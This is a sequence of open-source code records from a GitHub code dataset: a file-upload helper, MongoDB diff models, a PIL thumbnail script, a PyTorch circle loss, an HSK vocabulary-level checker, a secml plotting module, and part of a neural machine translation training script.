os.fstat(fobj.fileno()).st_size\n hashobj.update(b\"blob %i\\0\" % size)\n for chunk in chunk_reader(fobj):\n hashobj.update(chunk)\n fobj.seek(0)\n return hashobj.hexdigest()\n\n\ndef clean_filename(filename):\n \"\"\"Borrowed from Werkzeug : http://werkzeug.pocoo.org/\n \"\"\"\n for sep in os.path.sep, os.path.altsep:\n if sep:\n filename = filename.replace(sep, ' ')\n\n filename = filename.strip()\n\n # on nt a couple of special files are present in each folder. We\n # have to ensure that the target file is not such a filename. 
In\n    # this case we prepend an underline\n    if os.name == 'nt' and filename and \\\n            filename.split('.')[0].upper() in _windows_device_files:\n        filename = '_' + filename\n\n    return filename.translate(remove_punctuation_map)\n\n\ndef persist_files(destination, *files):\n    \"\"\"Persist each unique upload into `destination` and yield (digest, filename, size, date) tuples.\n    \"\"\"\n    # digest registry\n    \n    digests = set()\n\n    for item in files:\n        digested = digest(item.file)\n        if digested not in digests:\n            digests.add(digested)\n            filename = clean_filename(item.filename)\n            path = os.path.join(destination, filename)\n            with open(path, 'wb') as upload:\n                shutil.copyfileobj(item.file, upload)\n            size, date = stat_file(path)\n            yield (digested, filename, size, date)\n","repo_name":"Cromlech/dolmen.api_engine","sub_path":"src/dolmen/api_engine/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"33233299097","text":"# coding: utf-8\nimport uuid\nfrom datetime import datetime\n\nfrom mongoengine import (\n    Document,\n    UUIDField,\n    StringField,\n    DateTimeField,\n)\n\nfrom opac_proc.web import config\n\n\nclass BaseDiffModel(object):\n    _id = UUIDField(primary_key=True, required=True, default=uuid.uuid4)\n    uuid = UUIDField(required=True, default=uuid.uuid4)\n    stage = StringField(max_length=20, required=True, default='default')  # ex: 'extract' | 'transform' | 'load'\n    collection_acronym = StringField(max_length=5, required=True, default=config.OPAC_PROC_COLLECTION)\n    # control fields:\n    created_at = DateTimeField()\n    updated_at = DateTimeField()\n    # action to perform: ADD | UPDATE | DELETE\n    action = StringField(max_length=20)\n    done_at = DateTimeField()\n\n    def save(self, *args, **kwargs):\n        if not self.created_at:\n            self.created_at = datetime.now()\n        self.updated_at = datetime.now()\n        return super(BaseDiffModel, self).save(*args, **kwargs)\n\n\nclass CollectionDiffModel(BaseDiffModel, Document):\n    meta = {\n        'collection': 'diff_collection',\n        'indexes': [\n            'uuid',\n            'collection_acronym',\n            'action',\n            'done_at',\n        ]\n    }\n\n    def __unicode__(self):\n        return self.collection_acronym\n\n\nclass JournalDiffModel(BaseDiffModel, Document):\n    journal_issn = StringField(max_length=10, required=True)\n\n    meta = {\n        'collection': 'diff_journal',\n        'indexes': [\n            'uuid',\n            'collection_acronym',\n            'journal_issn',\n            'action',\n            'done_at',\n        ]\n    }\n\n    def __unicode__(self):\n        return self.journal_issn\n\n\nclass IssueDiffModel(BaseDiffModel, Document):\n    journal_issn = StringField(max_length=10, required=True)\n    issue_pid = StringField(max_length=20, required=True)\n\n    meta = {\n        'collection': 'diff_issue',\n        'indexes': [\n            'uuid',\n            'collection_acronym',\n            'journal_issn',\n            'issue_pid',\n            'action',\n            'done_at',\n        ]\n    }\n\n    def __unicode__(self):\n        return self.issue_pid\n\n\nclass ArticleDiffModel(BaseDiffModel, Document):\n    journal_issn = StringField(max_length=10, required=True)\n    issue_pid = StringField(max_length=20, required=True)\n    article_pid = StringField(max_length=25, required=True)\n\n    meta = {\n        'collection': 'diff_article',\n        'indexes': [\n            'uuid',\n            'collection_acronym',\n            'journal_issn',\n            'issue_pid',\n            'article_pid',\n            'action',\n            'done_at',\n        ]\n    }\n\n    def __unicode__(self):\n        return self.article_pid\n\n\nclass NewsDiffModel(BaseDiffModel, Document):\n    url_id = StringField(max_length=256, required=True)\n\n    meta = {\n        'collection': 'diff_news',\n        'indexes': [\n            'uuid',\n            'collection_acronym',\n            'url_id',\n            'action',\n            'done_at',\n        ]\n    }\n\n    def 
__unicode__(self):\n        return self.url_id\n\n\nclass PressReleaseDiffModel(BaseDiffModel, Document):\n    url_id = StringField(max_length=256, required=True)\n\n    meta = {\n        'collection': 'diff_press_release',\n        'indexes': [\n            'uuid',\n            'collection_acronym',\n            'url_id',\n            'action',\n            'done_at',\n        ]\n    }\n\n    def __unicode__(self):\n        return self.url_id\n","repo_name":"scieloorg/opac_proc","sub_path":"opac_proc/datastore/diff_models.py","file_name":"diff_models.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"}
+{"seq_id":"11388212597","text":"from PIL import Image, ImageFilter\r\n\r\nimg = Image.open('./astro.jpg')\r\nimg.thumbnail((400,400))\r\nimg.save('thumbnail.jpg')\r\nprint(img.size)\r\n#filtered_img = img.filter(ImageFilter.SHARPEN)\r\n# filtered_img = img.convert('L')\r\n# box = (100,100,400,400)\r\n# region = filtered_img.crop(box)\r\n# region.save(\"grey.png\", 'png')\r\n# #filtered_img.rotate(90)\r\n","repo_name":"sharansingh1/imageplayground","sub_path":"image-playground/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"71704755927","text":"import torch\n\nfrom person_reid.loss.softmax_losses.base import SoftmaxLossMixin\n\n__all__ = ['Circle']\n\n\nclass Circle(SoftmaxLossMixin, torch.nn.Module):\n    def __init__(self,\n                 in_features,\n                 out_features,\n                 m=0.25,\n                 gamma=256,\n                 loss_dict=SoftmaxLossMixin.DEFAULT_LOSS,\n                 *args, **kwargs):\n        super(Circle, self).__init__()\n        SoftmaxLossMixin.__init__(self, loss_dict)\n        self.margin = m\n        self.gamma = gamma\n        self.class_num = out_features\n        self.emdsize = in_features\n\n        self.weight = torch.nn.Parameter(torch.FloatTensor(self.class_num, self.emdsize))\n        torch.nn.init.xavier_uniform_(self.weight)\n\n    def forward(self, input, label, *args, **kwargs):\n        similarity_matrix = torch.nn.functional.linear(\n            torch.nn.functional.normalize(input, p=2, dim=1, eps=1e-12),\n            torch.nn.functional.normalize(self.weight, p=2, dim=1, eps=1e-12))\n\n        one_hot = torch.zeros_like(similarity_matrix)\n        one_hot.scatter_(1, label.view(-1, 1).long(), 1)\n        one_hot = one_hot.type(dtype=torch.bool)\n        # sp = torch.gather(similarity_matrix, dim=1, index=label.unsqueeze(1))\n        sp = similarity_matrix[one_hot]\n        mask = one_hot.logical_not()\n        sn = similarity_matrix[mask]\n\n        sp = sp.view(input.size()[0], -1)\n        sn = sn.view(input.size()[0], -1)\n\n        ap = torch.clamp_min(-sp.detach() + 1 + self.margin, min=0.)\n        an = torch.clamp_min(sn.detach() + self.margin, min=0.)\n\n        delta_p = 1 - self.margin\n        delta_n = self.margin\n\n        logit_p = - ap * (sp - delta_p) * self.gamma\n        logit_n = an * (sn - delta_n) * self.gamma\n\n        output = torch.logsumexp(logit_n, dim=1) + torch.logsumexp(logit_p, dim=1)\n\n        return self._calc_loss(output, label)\n","repo_name":"JegernOUTT/reid_template","sub_path":"person_reid/loss/softmax_losses/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"8114355994","text":"#!/usr/local/bin/python3\n\nimport pickle\nimport csv\nfrom sys import stdin\n\n#---LOADING DICTIONARIES---#\n\nlevel1 = open(\"level1\",'rb')\ndefault_dict = pickle.load(level1)\nlevel2 = open(\"level2\",'rb')\ndefault_dict2 = pickle.load(level2)\nlevel3 = open(\"level3\",'rb')\ndefault_dict3 = 
pickle.load(level3)\nlevel4 = open(\"level4\",'rb')\ndefault_dict4 = pickle.load(level4)\nlevel5 = open(\"level5\",'rb')\ndefault_dict5 = pickle.load(level5)\n\nHSK_1 = open(\"HSK-1\",'rb')\nHSK_dict1 = pickle.load(HSK_1)\nHSK_2 = open(\"HSK-2\",'rb')\nHSK_dict2 = pickle.load(HSK_2)\nHSK_3 = open(\"HSK-3\",'rb')\nHSK_dict3 = pickle.load(HSK_3)\nHSK_4 = open(\"HSK-4\",'rb')\nHSK_dict4 = pickle.load(HSK_4)\nHSK_5 = open(\"HSK-5\",'rb')\nHSK_dict5 = pickle.load(HSK_5)\n\n#---CHECK FUNCTION FOR HSK Dictionary---#\ndef check(word):\n    if word in HSK_dict1: print(\"HSK_level 1\")\n    elif word in HSK_dict2: print(\"HSK_level 2\")\n    elif word in HSK_dict3: print(\"HSK_level 3\")\n    elif word in HSK_dict4: print(\"HSK_level 4\")\n    elif word in HSK_dict5: print(\"HSK_level 5\")\n    else: print()\n\nif __name__ == \"__main__\":\n    used = []\n#---Get Data---MANUAL RENAME--#\n    with open(\"TVJT stimuli.csv\") as csvfile:\n        reader = csv.DictReader(csvfile)\n        for row in reader: \n            # 'verb' is the column in the CSV file named \"verb\" #\n            if row['verb'] not in used:\n                used.append(row['verb'])\n            string1 = row['Num_CL']\n            # REMOVE ASPECT MARKER #\n            if len(string1) >= 2:\n                if string1[1:] not in used:\n                    used.append(string1[1:])\n            # object is the column in the CSV file named 'object' \n            if row['object'] not in used:\n                used.append(row['object'])\n\n#===Check Level===#\n    for i in used:\n        if i in default_dict: print(i,\":level 1\",end=\" \"); check(i) \n        elif i in default_dict2: print(i,\":level 2\",end = \" \"); check(i)\n        elif i in default_dict3: print(i,\":level 3\",end = \" \"); check(i)\n        elif i in default_dict4: print(i,\":level 4\",end = \" \"); check(i)\n        elif i in default_dict5: print(i,\":level 5\",end =\" \"); check(i)\n        else: print(i,\":none\")\n","repo_name":"joyyyjen/Dictionary-Checker-for-Word-Difficulty","sub_path":"checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"37724401876","text":"\"\"\"\n.. module:: CPlotFunction\n   :synopsis: Function plots.\n\n.. moduleauthor:: Marco Melis \n.. 
moduleauthor:: Ambra Demontis \n\n\"\"\"\nfrom secml.figure._plots import CPlot\nfrom secml.figure._plots.plot_utils import create_points_grid\nfrom secml.array import CArray\nfrom secml.core.constants import inf\nfrom secml.core.type_utils import is_list\n\n\nclass CPlotFunction(CPlot):\n \"\"\"Plots a Function.\n\n Custom plotting parameters can be specified.\n\n Currently parameters default:\n - show_legend: True\n - grid: True\n\n See Also\n --------\n .CPlot : basic subplot functions.\n .CFigure : creates and handle figures.\n\n \"\"\"\n\n def apply_params_fun(self):\n \"\"\"Apply defined parameters to active subplot.\"\"\"\n fig_legend = self.get_legend()\n if self.show_legend is not False and fig_legend is not None:\n fig_legend.set_visible(True)\n self.grid(grid_on=True)\n\n def plot_fun(self, func, multipoint=False,\n plot_background=True, plot_levels=True,\n levels=None, levels_color='k', levels_style=None,\n levels_linewidth=1.0, n_colors=50, cmap='jet',\n alpha=1.0, alpha_levels=1.0, vmin=None, vmax=None,\n colorbar=True, n_grid_points=30,\n grid_limits=None, func_args=(), **func_kwargs):\n \"\"\"Plot a function (used for decision functions or boundaries).\n\n Parameters\n ----------\n func : unbound function\n Function to be plotted.\n multipoint : bool, optional\n If True, all grid points will be passed to the function.\n If False (default), function is iterated over each\n point of the grid.\n plot_background : bool, optional\n Specifies whether to plot the value of func at each point\n in the background using a colorbar.\n plot_levels : bool, optional\n Specify if function levels should be plotted (default True).\n levels : list or None, optional\n List of levels to be plotted.\n If None, 0 (zero) level will be plotted.\n levels_color : str or tuple or None, optional\n If None, the colormap specified by cmap will be used.\n If a string, like 'k', all levels will be plotted in this color.\n If a tuple of colors (string, float, rgb, etc),\n different levels will be plotted in different colors\n in the order specified. Default 'k'.\n levels_style : [ None | 'solid' | 'dashed' | 'dashdot' | 'dotted' ]\n If levels_style is None, the default is 'solid'.\n levels_style can also be an iterable of the above strings\n specifying a set of levels_style to be used. If this iterable\n is shorter than the number of contour levels it will be\n repeated as necessary.\n levels_linewidth : float or list of floats, optional\n The line width of the contour lines. Default 1.0.\n n_colors : int, optional\n Number of color levels of background plot. Default 50.\n cmap : str or list or `matplotlib.pyplot.cm`, optional\n Colormap to use (default 'jet'). Could be a list of colors.\n alpha : float, optional\n The alpha blending value of the background. Default 1.0.\n alpha_levels : float, optional\n The alpha blending value of the levels. Default 1.0.\n vmin, vmax : float or None, optional\n Limits of the colors used for function plotting.\n If None, colors are determined by the colormap.\n colorbar : bool, optional\n True if colorbar should be displayed.\n n_grid_points : int, optional\n Number of grid points.\n grid_limits : list of tuple, optional\n List with a tuple of min/max limits for each axis.\n If None, [(0, 1), (0, 1)] limits will be used.\n func_args, func_kwargs\n Other arguments or keyword arguments to pass to `func`.\n\n Examples\n --------\n .. 
plot:: pyplots/plot_fun.py\n :include-source:\n\n \"\"\"\n levels = [0] if levels is None else levels\n\n # create the grid of the point where the function will be evaluated\n pad_grid_point_features, pad_xgrid, pad_ygrid = \\\n create_points_grid(grid_limits, n_grid_points)\n\n # Evaluate function on each grid point\n if multipoint is True:\n grid_points_value = func(\n pad_grid_point_features, *func_args, **func_kwargs)\n else:\n grid_points_value = pad_grid_point_features.apply_along_axis(\n func, 1, *func_args, **func_kwargs)\n\n grid_points_val_reshaped = grid_points_value.reshape(\n (pad_xgrid.shape[0], pad_xgrid.shape[1]))\n\n # Clipping values to show a correct color plot\n clip_min = -inf if vmin is None else vmin\n clip_max = inf if vmax is None else vmax\n grid_points_val_reshaped = grid_points_val_reshaped.clip(\n clip_min, clip_max)\n\n if is_list(cmap): # Convert list of colors to colormap\n from matplotlib.colors import ListedColormap\n cmap = ListedColormap(cmap)\n\n ch = None\n if plot_background is True:\n # Draw a fully colored plot using 50 levels\n ch = self.contourf(pad_xgrid, pad_ygrid,\n grid_points_val_reshaped,\n n_colors, cmap=cmap, alpha=alpha,\n vmin=vmin, vmax=vmax, zorder=0)\n\n # Displaying 20 ticks on the colorbar\n if colorbar is True:\n some_y = CArray.linspace(\n grid_points_val_reshaped.min(),\n grid_points_val_reshaped.max(), 20)\n self.colorbar(ch, ticks=some_y)\n\n if plot_levels is True:\n self.contour(\n pad_xgrid, pad_ygrid, grid_points_val_reshaped,\n levels=levels, colors=levels_color, linestyles=levels_style,\n linewidths=levels_linewidth, alpha=alpha_levels)\n\n # Customizing figure\n self.apply_params_fun()\n\n return ch\n\n def plot_fgrads(self, gradf, n_grid_points=30, grid_limits=None,\n color='k', linestyle='-', linewidth=1.0, alpha=1.0,\n func_args=(), **func_kwargs):\n \"\"\"Plot function gradient directions.\n\n Parameters\n ----------\n gradf : function\n Function that computes gradient directions.\n n_grid_points : int\n Number of grid points.\n grid_limits : list of tuple\n List with a tuple of min/max limits for each axis.\n If None, [(0, 1), (0, 1)] limits will be used.\n color :\n Color of the gradient directions.\n linestyle : str\n ['solid' | 'dashed', 'dashdot', 'dotted' |\n (offset, on-off-dash-seq) | '-' | '--' | '-.' 
| ':' |\n 'None' | ' ' | '']\n linewidth : float\n Width of the line.\n alpha : float\n Transparency factor of the directions.\n func_args, func_kwargs : any\n Other arguments or keyword arguments to pass to `gradf`.\n\n \"\"\"\n # create the grid of the point where the function will be evaluated\n pad_grid_point_features, pad_xgrid, pad_ygrid = \\\n create_points_grid(grid_limits, n_grid_points)\n\n n_vals = pad_grid_point_features.shape[0]\n grad_point_values = CArray.zeros((n_vals, 2))\n # compute gradient on each grid point\n for p_idx in range(n_vals):\n grad_point_values[p_idx, :] = gradf(\n pad_grid_point_features[p_idx, :].ravel(),\n *func_args, **func_kwargs)\n\n U = grad_point_values[:, 0].reshape(\n (pad_xgrid.shape[0], pad_xgrid.shape[1]))\n V = grad_point_values[:, 1].reshape(\n (pad_xgrid.shape[0], pad_xgrid.shape[1]))\n\n self.quiver(U, V, pad_xgrid, pad_ygrid,\n color=color, linestyle=linestyle,\n linewidth=linewidth, alpha=alpha)\n\n # Customizing figure\n self.apply_params_fun()\n","repo_name":"pralab/secml","sub_path":"src/secml/figure/_plots/c_plot_fun.py","file_name":"c_plot_fun.py","file_ext":"py","file_size_in_byte":8278,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"31"} +{"seq_id":"33510831606","text":"from __future__ import division\n\nimport onmt\nimport onmt.markdown\nimport onmt.modules\nimport argparse\nimport torch\nimport time, datetime\nfrom onmt.train_utils.trainer import XETrainer\nfrom onmt.train_utils.trainer_zoo import XEAdversarialTrainer, XEGenderTrainer\nfrom onmt.modules.loss import NMTLossFunc, NMTAndCTCLossFunc, MSEEncoderLoss, CosineEncoderLoss, CrossEntropyLossBase\nfrom onmt.model_factory import build_model, optimize_model\nfrom options import make_parser\nfrom collections import defaultdict\nimport os\nimport numpy as np\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n\nparser = argparse.ArgumentParser(description='train.py')\nonmt.markdown.add_md_help_argument(parser)\n\n# Please look at the options file to see the options regarding models and data\nparser = make_parser(parser)\n\nopt = parser.parse_args()\n\nprint(opt)\n\n# An ugly hack to have weight norm on / off\nonmt.constants.weight_norm = opt.weight_norm\nonmt.constants.checkpointing = opt.checkpointing\nonmt.constants.max_position_length = opt.max_position_length\n\n# Use static dropout if checkpointing > 0\nif opt.checkpointing > 0:\n onmt.constants.static = True\n\nif torch.cuda.is_available() and not opt.gpus:\n print(\"WARNING: You have a CUDA device, should run with -gpus 0\")\n\ntorch.manual_seed(opt.seed)\n\n\ndef numpy_to_torch(tensor_list):\n\n out_list = list()\n\n for tensor in tensor_list:\n if isinstance(tensor, np.ndarray):\n out_list.append(torch.from_numpy(tensor))\n else:\n out_list.append(tensor)\n\n return out_list\n\n\ndef main():\n\n if not opt.multi_dataset:\n if opt.data_format in ['bin', 'raw']:\n start = time.time()\n\n if opt.data.endswith(\".train.pt\"):\n print(\"Loading data from '%s'\" % opt.data)\n dataset = torch.load(opt.data)\n else:\n print(\"Loading data from %s\" % opt.data + \".train.pt\")\n dataset = torch.load(opt.data + \".train.pt\")\n\n elapse = str(datetime.timedelta(seconds=int(time.time() - start)))\n print(\"Done after %s\" % elapse)\n\n dicts = dataset['dicts']\n\n # For backward compatibility\n train_dict = defaultdict(lambda: None, dataset['train'])\n valid_dict = defaultdict(lambda: None, dataset['valid'])\n\n if train_dict['src_lang'] is not None:\n assert 'langs' in dicts\n 
train_src_langs = train_dict['src_lang']\n train_tgt_langs = train_dict['tgt_lang']\n else:\n # allocate new languages\n dicts['langs'] = {'src': 0, 'tgt': 1}\n train_src_langs = list()\n train_tgt_langs = list()\n # Allocation one for the bilingual case\n train_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n train_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n if not opt.streaming:\n train_data = onmt.Dataset(train_dict['src'], train_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=train_src_langs, tgt_langs=train_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n token_level_lang=opt.language_classifier_tok,\n num_split=len(opt.gpus),\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n train_data = onmt.StreamDataset(train_dict['src'], train_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=train_src_langs, tgt_langs=train_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n en_id=opt.en_id)\n\n if valid_dict['src_lang'] is not None:\n assert 'langs' in dicts\n valid_src_langs = valid_dict['src_lang']\n valid_tgt_langs = valid_dict['tgt_lang']\n else:\n # allocate new languages\n valid_src_langs = list()\n valid_tgt_langs = list()\n\n # Allocation one for the bilingual case\n valid_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n valid_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n if not opt.streaming:\n valid_data = onmt.Dataset(valid_dict['src'], valid_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=valid_src_langs, tgt_langs=valid_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n upsampling=opt.upsampling,\n token_level_lang=opt.language_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n valid_data = onmt.StreamDataset(valid_dict['src'], valid_dict['tgt'],\n src_sizes=None, tgt_sizes=None,\n src_langs=valid_src_langs, tgt_langs=valid_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=dataset.get(\"type\", \"text\"), sorting=True,\n batch_size_sents=opt.batch_size_sents,\n upsampling=opt.upsampling)\n\n print(' * number of training sentences. %d' % len(dataset['train']['src']))\n print(' * maximum batch size (words per batch). 
%d' % opt.batch_size_words)\n\n elif opt.data_format in ['scp', 'scpmem', 'mmem']:\n print(\"Loading memory mapped data files ....\")\n start = time.time()\n from onmt.data.mmap_indexed_dataset import MMapIndexedDataset\n from onmt.data.scp_dataset import SCPIndexDataset\n\n dicts = torch.load(opt.data + \".dict.pt\")\n if opt.data_format in ['scp', 'scpmem']:\n audio_data = torch.load(opt.data + \".scp_path.pt\")\n\n # allocate languages if not\n if 'langs' not in dicts:\n dicts['langs'] = {'src': 0, 'tgt': 1}\n else:\n print(dicts['langs'])\n\n train_path = opt.data + '.train'\n if opt.data_format in ['scp', 'scpmem']:\n train_src = SCPIndexDataset(audio_data['train'], concat=opt.concat)\n else:\n train_src = MMapIndexedDataset(train_path + '.src')\n\n train_tgt = MMapIndexedDataset(train_path + '.tgt')\n\n # check the lang files if they exist (in the case of multi-lingual models)\n if os.path.exists(train_path + '.src_lang.bin'):\n assert 'langs' in dicts\n train_src_langs = MMapIndexedDataset(train_path + '.src_lang')\n train_tgt_langs = MMapIndexedDataset(train_path + '.tgt_lang')\n else:\n train_src_langs = list()\n train_tgt_langs = list()\n # Allocate a Tensor(1) for the bilingual case\n train_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n train_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(train_path + '.gen_sent.bin'):\n assert 'gen_sent' in dicts\n train_gen_sent = MMapIndexedDataset(train_path + '.gen_sent')\n else:\n train_gen_sent = list()\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(train_path + '.gen_tok.bin'):\n assert 'gen_tok' in dicts\n train_gen_tok = MMapIndexedDataset(train_path + '.gen_tok')\n else:\n train_gen_tok = list()\n\n\n # check the length files if they exist\n if os.path.exists(train_path + '.src_sizes.npy'):\n train_src_sizes = np.load(train_path + '.src_sizes.npy')\n train_tgt_sizes = np.load(train_path + '.tgt_sizes.npy')\n else:\n train_src_sizes, train_tgt_sizes = None, None\n\n if opt.encoder_type == 'audio':\n data_type = 'audio'\n else:\n data_type = 'text'\n\n if not opt.streaming:\n if opt.gender_classifier:\n if opt.gender_classifier_tok:\n train_gen_data = train_gen_tok\n elif opt.gender_classifier_sent:\n train_gen_data = train_gen_sent\n else:\n raise NotImplementedError\n else:\n train_gen_data = None\n\n train_data = onmt.Dataset(train_src,\n train_tgt,\n train_src_sizes, train_tgt_sizes,\n train_src_langs, train_tgt_langs,\n train_gen_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n src_align_right=opt.src_align_right,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n cleaning=True, verbose=True,\n num_split=len(opt.gpus),\n token_level_lang=opt.language_classifier_tok,\n token_level_gen=opt.gender_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n train_data = onmt.StreamDataset(train_src,\n train_tgt,\n train_src_langs, train_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=False,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n upsampling=opt.upsampling)\n\n valid_path = opt.data + '.valid'\n if opt.data_format in ['scp', 'scpmem']:\n valid_src = SCPIndexDataset(audio_data['valid'], concat=opt.concat)\n else:\n valid_src = 
MMapIndexedDataset(valid_path + '.src')\n valid_tgt = MMapIndexedDataset(valid_path + '.tgt')\n\n if os.path.exists(valid_path + '.src_lang.bin'):\n assert 'langs' in dicts\n valid_src_langs = MMapIndexedDataset(valid_path + '.src_lang')\n valid_tgt_langs = MMapIndexedDataset(valid_path + '.tgt_lang')\n else:\n valid_src_langs = list()\n valid_tgt_langs = list()\n\n # Allocation one for the bilingual case\n valid_src_langs.append(torch.Tensor([dicts['langs']['src']]))\n valid_tgt_langs.append(torch.Tensor([dicts['langs']['tgt']]))\n\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(valid_path + '.gen_sent.bin'):\n assert 'gen_sent' in dicts\n valid_gen_sent = MMapIndexedDataset(valid_path + '.gen_sent')\n else:\n valid_gen_sent = list()\n\n # check if gender files exist (in the case of mushe training data)\n if os.path.exists(valid_path + '.gen_tok.bin'):\n assert 'gen_tok' in dicts\n valid_gen_tok = MMapIndexedDataset(valid_path + '.gen_tok')\n else:\n valid_gen_tok = list()\n\n\n # check the length files if they exist\n if os.path.exists(valid_path + '.src_sizes.npy'):\n valid_src_sizes = np.load(valid_path + '.src_sizes.npy')\n valid_tgt_sizes = np.load(valid_path + '.tgt_sizes.npy')\n else:\n valid_src_sizes, valid_tgt_sizes = None, None\n\n if not opt.streaming:\n if opt.gender_classifier:\n if opt.gender_classifier_tok:\n valid_gen_data = valid_gen_tok\n elif opt.gender_classifier_sent:\n valid_gen_data = valid_gen_sent\n else:\n raise NotImplementedError\n else:\n valid_gen_data = None\n valid_data = onmt.Dataset(valid_src, valid_tgt,\n valid_src_sizes, valid_tgt_sizes,\n valid_src_langs, valid_tgt_langs,\n valid_gen_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n src_align_right=opt.src_align_right,\n cleaning=True, verbose=True, debug=True,\n num_split=len(opt.gpus),\n token_level_lang=opt.language_classifier_tok,\n token_level_gen=opt.gender_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n en_id=opt.en_id)\n else:\n # for validation data, we have to go through sentences (very slow but to ensure correctness)\n valid_data = onmt.StreamDataset(valid_src, valid_tgt,\n valid_src_langs, valid_tgt_langs,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents)\n\n elapse = str(datetime.timedelta(seconds=int(time.time() - start)))\n print(\"Done after %s\" % elapse)\n\n else:\n raise NotImplementedError\n\n print(' * number of sentences in training data: %d' % train_data.size())\n print(' * number of sentences in validation data: %d' % valid_data.size())\n\n else:\n print(\"[INFO] Reading multiple dataset ...\")\n # raise NotImplementedError\n\n dicts = torch.load(opt.data + \".dict.pt\")\n\n root_dir = os.path.dirname(opt.data)\n print(dicts['langs'])\n print(\"Loading training data ...\")\n\n train_dirs, valid_dirs = dict(), dict()\n\n # scan the data directory to find the training data\n for dir_ in os.listdir(root_dir):\n if os.path.isdir(os.path.join(root_dir, dir_)):\n if str(dir_).startswith(\"train\"):\n idx = int(dir_.split(\".\")[1])\n train_dirs[idx] = dir_\n if dir_.startswith(\"valid\"):\n idx = int(dir_.split(\".\")[1])\n valid_dirs[idx] = dir_\n\n train_sets, valid_sets = list(), list()\n\n for (idx_, dir_) in sorted(train_dirs.items()):\n\n data_dir = os.path.join(root_dir, dir_)\n print(\"[INFO] Loading training data %i from %s\" % (idx_, dir_))\n\n if opt.data_format in 
['bin', 'raw']:\n raise NotImplementedError\n\n elif opt.data_format in ['scp', 'scpmem', 'mmem']:\n from onmt.data.mmap_indexed_dataset import MMapIndexedDataset\n from onmt.data.scp_dataset import SCPIndexDataset\n\n if opt.data_format in ['scp', 'scpmem']:\n audio_data = torch.load(os.path.join(data_dir, \"data.scp_path.pt\"))\n src_data = SCPIndexDataset(audio_data, concat=opt.concat)\n else:\n src_data = MMapIndexedDataset(os.path.join(data_dir, \"data.src\"))\n\n tgt_data = MMapIndexedDataset(os.path.join(data_dir, \"data.tgt\"))\n\n src_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.src_lang'))\n tgt_lang_data = MMapIndexedDataset(os.path.join(data_dir, 'data.tgt_lang'))\n\n if os.path.exists(os.path.join(data_dir, 'data.src_sizes.npy')):\n src_sizes = np.load(os.path.join(data_dir, 'data.src_sizes.npy'))\n tgt_sizes = np.load(os.path.join(data_dir, 'data.tgt_sizes.npy'))\n else:\n src_sizes, tgt_sizes = None, None\n\n if opt.encoder_type == 'audio':\n data_type = 'audio'\n else:\n data_type = 'text'\n\n if not opt.streaming:\n train_data = onmt.Dataset(src_data,\n tgt_data,\n src_sizes, tgt_sizes,\n src_lang_data, tgt_lang_data,\n batch_size_words=opt.batch_size_words,\n data_type=data_type, sorting=True,\n batch_size_sents=opt.batch_size_sents,\n multiplier=opt.batch_size_multiplier,\n src_align_right=opt.src_align_right,\n augment=opt.augment_speech,\n upsampling=opt.upsampling,\n cleaning=True, verbose=True,\n num_split=len(opt.gpus),\n token_level_lang=opt.language_classifier_tok,\n bidirectional=opt.bidirectional_translation,\n multidataset=True,\n en_id=opt.en_id)\n\n train_sets.append(train_data)\n\n else:\n print(\"Multi-dataset not implemented for Streaming tasks.\")\n raise NotImplementedError\n\n for (idx_, dir_) in 